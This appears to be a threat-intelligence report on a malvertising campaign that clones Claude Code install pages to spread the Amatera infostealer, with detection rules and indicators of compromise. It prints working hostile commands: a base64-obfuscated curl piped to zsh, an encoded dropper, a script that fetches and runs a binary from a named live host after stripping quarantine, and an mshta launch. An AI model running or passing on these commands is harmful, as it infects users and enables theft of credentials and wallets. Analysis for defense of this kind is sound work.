InstallFix: Dissecting a Multi-Stage Infostealer Campaign Hiding Behind Fake Claude Code Installers
Published: 2026-03-08 Severity: High Malware Family: Amatera Stealer (ACR Stealer / AcridRain lineage) Campaign: InstallFix (ClickFix variant) Status: C2 actively serving payloads at time of publication
TL;DR
A malvertising campaign is exploiting Google Ads to serve pixel-perfect clones of Claude Code installation pages via Squarespace and Cloudflare Pages. Victims who copy the displayed install command unknowingly execute a multi-stage loader that delivers Amatera Stealer -- a $199-$1,499/year MaaS infostealer positioned as Lumma's successor. The macOS variant uses a fileless pipe-based execution chain from an unsigned universal Mach-O binary; the Windows variant chains 7 layers of fileless execution through mshta.exe, .NET deserialization gadgets, and reflective PE loading with direct SYSENTER syscalls.
Campaign Overview
The InstallFix campaign targets developers searching for "Claude Code install" or "Claude Code CLI" on Google. Sponsored results direct victims to lure pages hosted on trusted platforms -- Squarespace, Cloudflare Pages, and Tencent EdgeOne -- that mirror the official Claude Code documentation down to sidebar navigation and branding. Every non-install link on the fake page redirects to legitimate anthropic.com URLs, so the victim's post-infection browsing experience appears normal.
This is a pure malvertising play. No email vector, no phishing links. The attack surface is the search engine results page itself.
Lure Infrastructure
The operators rotate lure domains across legitimate hosting platforms to inherit trust and dodge domain-reputation blocklists:
| Domain | Platform | Status |
|---|---|---|
claude-code-cmd[.]squarespace[.]com | Squarespace | DOWN (404) |
claude-code-install[.]squarespace[.]com | Squarespace | Resolving |
claudecode-developers[.]squarespace[.]com | Squarespace | Resolving |
claulastver[.]squarespace[.]com | Squarespace | Unknown |
claud-code[.]pages[.]dev | Cloudflare Pages | 403 |
claude-code-docs-site[.]pages[.]dev | Cloudflare Pages | Unknown |
claude-code-macos[.]com | Cloudflare | 403 |
myclauda[.]it[.]com | Unknown | Unknown |
vdsafsaf[.]it[.]com | Unknown | Unknown |
Squarespace and Cloudflare Pages handle SSL at the platform level, so no custom certificate issuance appears in CT logs -- eliminating a common hunting vector.
C2 Infrastructure
Primary C2: contatoplus[.]com -- LIVE
The primary C2 was registered on 2026-02-23 via Hello Internet Corp (hello.co). It sits behind Cloudflare (AS13335) running nginx, with a Let's Encrypt wildcard certificate. The domain was previously owned (GoDaddy certificates appear in CT logs from March 2025), then re-registered to inherit aged domain reputation and bypass new-domain blocklists.
No email infrastructure exists on this domain (no MX, SPF, DKIM, or DMARC records) -- it exists solely for payload delivery.
Critical evasion: User-Agent filtering. The C2 only serves payloads when the request's User-Agent header contains the case-sensitive substring curl/:
$ curl -s -o /dev/null -w "%{http_code}" https://contatoplus[.]com/n8n/update
200
$ curl -s -o /dev/null -w "%{http_code}" -A "Mozilla/5.0" https://contatoplus[.]com/n8n/update
404
$ curl -s -o /dev/null -w "%{http_code}" -A "CURL" https://contatoplus[.]com/n8n/update
404
The match is case-sensitive (CURL returns 404) and substring-based (test curl/test returns 200). This renders the C2 invisible to browser-based URL scanners, automated crawlers, wget, python-requests, and most OSINT tooling.
Payload Mutation
During a 30-minute observation window, the macOS Mach-O binary served from /n8n/update mutated:
| Time (UTC) | Size | SHA256 |
|---|---|---|
| ~02:14 | 6,449,464 bytes | 17a46b70be102d72b47fc81eed76b3684f0583058b78175122657bb3438bc8dc |
| ~02:45 | 17,929,080 bytes | 672e00036b13530c236fa98f5046844965f0a0515861f03c5e1d67b73225773e |
The binary nearly tripled in size within 30 minutes. This is active, real-time development and deployment -- not a scheduled rotation.
Infrastructure Correlation
Two domains share identical Cloudflare nameservers (amir.ns.cloudflare.com + gigi.ns.cloudflare.com), meaning they sit in the same Cloudflare account:
claude-code-macos[.]com-- registered via NiceNIC (Hong Kong)update-version[.]com-- registered via NiceNIC (Hong Kong)
Both were created within days of each other. This definitively ties the macOS lure domain to the Windows C2 infrastructure under one operator.
macOS Kill Chain
Stage 1: Poisoned Install Command
The lure page presents what appears to be a standard curl | sh install command. The actual payload:
curl -ksfLS $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20vY3VybC84ZDJkMjc1MzYwYWRlZGVjZmJiZDkxNTY3ZGFkZGVlZDgwZDIwYWNlYjhhYTQzMjBkMDZhMjE0ODY0OTM5NDVi'|base64 -D)| zsh
The base64 decodes to:
https://contatoplus[.]com/curl/8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b
The hash in the URL path does not match the file hash -- it functions as a campaign or victim tracking identifier.
Stage 2: Compressed Zsh Dropper (229 bytes)
The fetched script is a gzip-compressed, base64-encoded zsh dropper:
#!/bin/zsh
yujdlp=$(base64 -D <<'PAYLOAD_END' | gunzip
H4sIAJZGnGkC/13LQQqAIBBA0X2nmAjchM02uo1NgoE6g44gnb6W1fI/+NOI+5nxqmGgViJYBtQk
GHwUXyCoSt0QibM6ZYmtLsQJ85qxyeHUgzHQnWoBS5/1cQqJD5j731853JG28ZGBAAAA
PAYLOAD_END
)
eval "$yujdlp"
SHA256: a48551015047792184589c132ec394b82cf4938642e50424369eb4a1fe9348f8
Stage 3: Inner Script
The decompressed payload is minimal:
#!/bin/zsh
curl -o /tmp/helper https://contatoplus.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper
Three operations: download binary, strip Gatekeeper quarantine attributes (xattr -c, T1553.001), execute.
Stage 4: Amatera Mach-O Binary
The final payload is an unsigned universal Mach-O binary (x86_64 + arm64) compiled with the macOS 26.2.0 SDK (Xcode/Tahoe, March 2026). It links only two system libraries (libc++.1.dylib, libSystem.B.dylib) and imports exactly 22 functions:
fork, execl, execvp, pipe, dup2, write, close, waitpid, usleep, abort, _exit,
memcpy, memmove, bzero, std::string::append, std::string::reserve,
std::string::push_back, std::string::operator=, std::__next_prime
No networking APIs. No Objective-C. No frameworks. This binary's sole purpose is to decode and execute an embedded script.
Obfuscation profile:
| Technique | Detail |
|---|---|
| Fully stripped symbols | All 28 symbol table entries + 584-byte string table zeroed |
| Encrypted strings | __cstring section encoded; strings built at runtime via MOV immediate |
| Encrypted payload | 2.75 MB in __const -- arrays of uint16 values (0x0000-0x0400) |
| Constructor-based entry | main() is a no-op; real entry via __mod_init_func |
| Only plaintext strings | /bin/bash and -s (assembled char-by-char in registers) |
Execution flow (fileless):
- Constructor decodes 2.75 MB embedded script from
__constword tables using__cstringkeys pipe()creates an IPC channelfork()creates a child process- Parent writes decoded bash script to the pipe via
write() - Child redirects stdin with
dup2(), then callsexecl("/bin/bash", "bash", "-s", NULL) - The bash script executes entirely in memory -- it never touches disk
- The decoded bash script contains the actual stealing logic: browser credential harvesting, keychain access, wallet extraction
Windows Kill Chain: 7-Layer Fileless Implant
The Windows variant achieves full execution without dropping a single file to disk, chaining 7 layers of in-memory techniques.
Stage 0: LOLBin Entry
C:\Windows\SysWOW64\mshta.exe https://claude[.]update-version[.]com/claude
The use of SysWOW64 (32-bit) mshta.exe is deliberate -- it enables WoW64 syscall evasion techniques later in the chain.
The 7 Layers
| Layer | Technique | Detail |
|---|---|---|
| 1 | mshta.exe LOLBin | Signed Microsoft binary proxies execution (T1218.005) |
| 2 | HTA/VBScript | 1,476,332 bytes, 531 lines, 6 polymorphic blocks, 100+ XOR stubs |
| 3 | .NET CLR Activation | Loads the CLR into mshta.exe's process space without spawning a new process |
| 4 | XAML gadget chain | BinaryFormatter.Deserialize() -> TextFormattingRunProperties -> disables ActivitySurrogateSelector type check |
| 5 | AxHost+State smuggling | Second deserialization loads a .NET PE entirely in memory |
| 6 | 3 .NET loader stubs | Each stub carries encrypted shellcode, deserialized into memory |
| 7 | Reflective PE loader | 105 KB shellcode maps a 326 KB native implant into memory |
The entire process tree is cmd.exe -> mshta.exe -> conhost.exe. Everything executes inside the mshta.exe process context.
Final Implant Characteristics
The reflectively-loaded native implant (326,144 bytes, x86) imports only from KERNEL32.DLL and SECUR32.DLL. All other API resolution happens dynamically at runtime. Syscalls bypass EDR userland hooks entirely via direct SYSENTER instructions. C2 communications use custom SSPI-negotiated TLS with AES-256-GCM encryption and domain fronting behind facebook.com, with DNS-over-HTTPS as a fallback resolution mechanism.
Amatera Stealer Profile
Amatera is a Malware-as-a-Service infostealer sold by the threat actor "SheldIO" on Telegram. It descends from ACR Stealer (AcridRain) via GrMsk Stealer, and has been positioned as a Lumma Stealer replacement following Lumma's law enforcement disruption.
| Attribute | Value |
|---|---|
| Lineage | ACR Stealer (AcridRain) -> GrMsk Stealer -> Amatera |
| Author | SheldIO |
| MaaS pricing | $199/month -- $1,499/year |
| Microsoft detection | Trojan:Win32/Amatera.A!AMTB (published 2026-02-05) |
Exfiltration Targets
- Browser credentials, cookies, and session tokens (Chrome, Edge, Firefox, 7+ Chromium variants)
- Cryptocurrency wallets (MetaMask, Phantom, Exodus, and others)
- Messaging sessions (Telegram, Steam, Discord)
- Password manager browser extensions
- FTP client credentials and email service tokens
- Full system fingerprint (hostname, OS, CPU, locale, network configuration)
Evasion Stack
- macOS: Gatekeeper bypass (
xattr -c), fileless pipe-to-bash execution, stripped/encrypted Mach-O - Windows: WoW64 direct syscalls, NTSockets (kernel device
\Device\Afd\Endpoint), AMSI + ETW bypass, PowerShell logging suppression, anti-sandbox/VM/debugger checks, dynamic API resolution with wildcard matching, domain fronting - C2-level: User-Agent filtering (serves only to
curl/), expired domain re-registration for reputation, Cloudflare fronting, payload mutation
Windows Persistence
- Registry Run key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Runwith names mimicking Microsoft services (e.g., "Microsoft Update") - Mutex:
AsyncMutex_6SI8OkPnk - LOLBin persistence:
SyncAppvPublishingServer.vbs(App-V signed script abuse)
Detection Guidance
Network-Based
- Alert on
mshta.exemaking outbound HTTPS connections to non-Microsoft domains - Monitor for
curlcommands with base64-encoded URLs piped to shell interpreters (zsh,bash,sh) - Block newly registered domains (<30 days) in developer tool installation contexts
- Flag
curl/User-Agent requests to non-standard domains with/n8n/or/curl/URL path segments
Host-Based -- macOS
xattr -cfollowed by execution of any binary in/tmp/- Creation and execution of
/tmp/helper bash -sorzsh -s(stdin script execution) spawned by unknown parent binaries- Unsigned Mach-O universal binaries with minimal imports matching the
fork+pipe+execpattern
Host-Based -- Windows
mshta.exespawned bycmd.exewith URL parameters pointing to newly registered domainsmshta.exeloading .NET CLR libraries (clr.dll,mscorlib.dll) -- this is anomalous behaviorBinaryFormatter.Deserializecalls originating from an mshta.exe process contextSyncAppvPublishingServer.vbsexecution outside of legitimate App-V management workflows- Processes with minimal import tables issuing direct
SYSENTERsyscalls - Registry Run key additions at
HKCU\...\Runmimicking Microsoft service names conhost.exespawned as a direct child ofmshta.exe
MITRE ATT&CK Mapping
| ID | Technique | Platform |
|---|---|---|
| T1583.001 | Acquire Infrastructure: Domains | Both |
| T1583.006 | Acquire Infrastructure: Web Services | Both |
| T1608.005 | Stage Capabilities: Link Target (malvertising) | Both |
| T1204.001 | User Execution: Malicious Link | Both |
| T1059.001 | Command and Scripting Interpreter: PowerShell | Windows |
| T1059.004 | Command and Scripting Interpreter: Unix Shell | macOS |
| T1059.005 | Command and Scripting Interpreter: Visual Basic | Windows |
| T1218.005 | System Binary Proxy Execution: Mshta | Windows |
| T1553.001 | Subvert Trust Controls: Gatekeeper Bypass | macOS |
| T1027 | Obfuscated Files or Information | Both |
| T1140 | Deobfuscate/Decode Files or Information | Both |
| T1055 | Process Injection | Both |
| T1106 | Native API | Both |
| T1547.001 | Boot/Logon Autostart: Registry Run Keys | Windows |
| T1071.001 | Application Layer Protocol: Web Protocols | Both |
| T1090 | Proxy: Domain Fronting | Windows |
| T1555.003 | Credentials from Web Browsers | Both |
| T1539 | Steal Web Session Cookie | Both |
| T1005 | Data from Local System | Both |
| T1082 | System Information Discovery | Both |
| T1497 | Virtualization/Sandbox Evasion | Windows |
IOCs
File Hashes (SHA256)
| Hash | Description |
|---|---|
a48551015047792184589c132ec394b82cf4938642e50424369eb4a1fe9348f8 | macOS Stage 1 zsh dropper (229 bytes) |
17a46b70be102d72b47fc81eed76b3684f0583058b78175122657bb3438bc8dc | macOS Mach-O universal binary (6.15 MB) |
672e00036b13530c236fa98f5046844965f0a0515861f03c5e1d67b73225773e | macOS Mach-O mutated variant (17.9 MB) |
57529656f02ecea388f45acc37fa94dd668047d3ef1f4d42bca94894ff07632c | Windows native implant (326 KB) |
bd756859dcb3c22fa2325d456b84ca368b98db7aa85617551795b34939691061 | Windows shellcode -- reflective PE loader |
254bda6f4ca8cd1a7a3b677a305e8710c431ca47d78498949241547f516456f9 | XAML deserialization bypass payload |
f03cc1d8b53d4c931e2f62dc0c39b0bd3313ce491fb022432150dc7356a5dc13 | .NET loader stub #1 |
7cdb09b9678031e317cdbb5e2450eb676501579a0621f46cdfcd27e67fe57e09 | .NET loader stub #2 |
b30fa9d3953803d818a8c64d7ab682ba06b9caa85c2821f07b3a8fb93ca6f843 | .NET loader stub #3 |
975e739cd196fa1466bf28498de3ea779d11cce6699871c21d0ec0fd7964d14d | "Claude Setup.exe" trojanized installer (Golang) |
f709d35e070a1b74f9465149226edf3debbce18c544e3cfca28caf82a82e20bb | verification.msi -- drops clipx.exe |
73fd51d4a0959e5c5a82db9be0d765069d02a2b97f51f55f5d6422a7bec01caa | Amatera sample (Malpedia reference) |
File Hashes (MD5 / SHA1)
| Hash | Type | Description |
|---|---|---|
a587d743e7391dda633e7e7fabb84a24 | MD5 | macOS Stage 1 dropper |
3f21d40d4e8b2398f9ae8ae7ce960cad | MD5 | macOS Mach-O sample 1 |
7454a6475551a9f6f55f4eca639e76f9 | MD5 | macOS Mach-O sample 2 |
dc7af79d157db4aa1516e5235dfa4d0854423c36 | SHA1 | macOS Mach-O sample 1 |
Mach-O UUIDs
bf04d849-26f1-3d1f-9b07-cfe836e67000 (x86_64)
7a5e2d70-43f8-3fb6-861d-156a7d7e55ef (arm64)
Domains
| Domain | Role |
|---|---|
contatoplus[.]com | macOS C2 / payload delivery (LIVE) |
claude[.]update-version[.]com | Windows C2 / HTA delivery |
update-version[.]com | Windows parent domain |
sarahmoftah[.]com | Alternate C2 |
claude-code-macos[.]com | Lure / payload |
claud-clients[.]com | MSI delivery |
wriconsult[.]com | Malware delivery |
amaprox[.]icu | Amatera C2 |
talismanoverblown[.]com | Amatera C2 |
claude-code-cmd[.]squarespace[.]com | Lure page |
claude-code-install[.]squarespace[.]com | Lure page |
claudecode-developers[.]squarespace[.]com | Lure page |
claulastver[.]squarespace[.]com | Lure page |
claud-code[.]pages[.]dev | Lure page |
claude-code-docs-site[.]pages[.]dev | Lure page |
Payload URLs
hxxps://contatoplus[.]com/curl/8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b
hxxps://contatoplus[.]com/n8n/update
hxxps://claude[.]update-version[.]com/claude
hxxps://sarahmoftah[.]com/curl/958ca005af6a71be22cfcd5de82ebf5c8b809b7ee28999b6ed38bfe5d19420
IP Addresses
| IP | ASN | Role |
|---|---|---|
104.21.32.228 | AS13335 (Cloudflare) | contatoplus[.]com C2 |
172.67.156.82 | AS13335 (Cloudflare) | contatoplus[.]com C2 |
198.185.159.176-177 | AS53831 (Squarespace) | Lure hosting |
198.49.23.176-177 | AS53831 (Squarespace) | Lure hosting |
172.67.129.152 | AS13335 (Cloudflare) | claude-code-macos[.]com |
104.21.2.196 | AS13335 (Cloudflare) | claude-code-macos[.]com |
188.114.96.3 | Cloudflare | claud-clients[.]com |
188.114.97.3 | Cloudflare | claud-clients[.]com |
91.98.229.246 | AS24940 (Hetzner) | Amatera C2 |
87.120.219.26 | Global Connectivity Solutions | Amatera C2 |
45.94.47.224 | Hosting Industry Limited | Amatera C2 |
SSL Certificate Serials
061feb2e8329c5622e643116c9ebc473bad5 (Let's Encrypt E7, contatoplus.com)
0ba7ae1d49de501447bb77a856db564f (Sectigo/Cloudflare, contatoplus.com)
Host Artifacts
| Type | Value |
|---|---|
| File | /tmp/helper (macOS) |
| Registry | HKCU\Software\Microsoft\Windows\CurrentVersion\Run (deceptive names) |
| Mutex | AsyncMutex_6SI8OkPnk |
References
- BleepingComputer: Fake Claude Code install guides push infostealers
- Push Security: InstallFix
- Maurice Fielenbach: Paste With Caution
- Proofpoint: Amatera Stealer
- Blackpoint: Fake CAPTCHA Delivering Amatera
- Microsoft: Trojan:Win32/Amatera.A!AMTB
- Malpedia: win.amatera
- eSentire: EVALUSION Campaign
- ANY.RUN: Claude Setup.exe analysis
- VenzoV: Amatera Stealer v1 Analysis
- AdGuard: Claude-linked Google ads dupe macOS users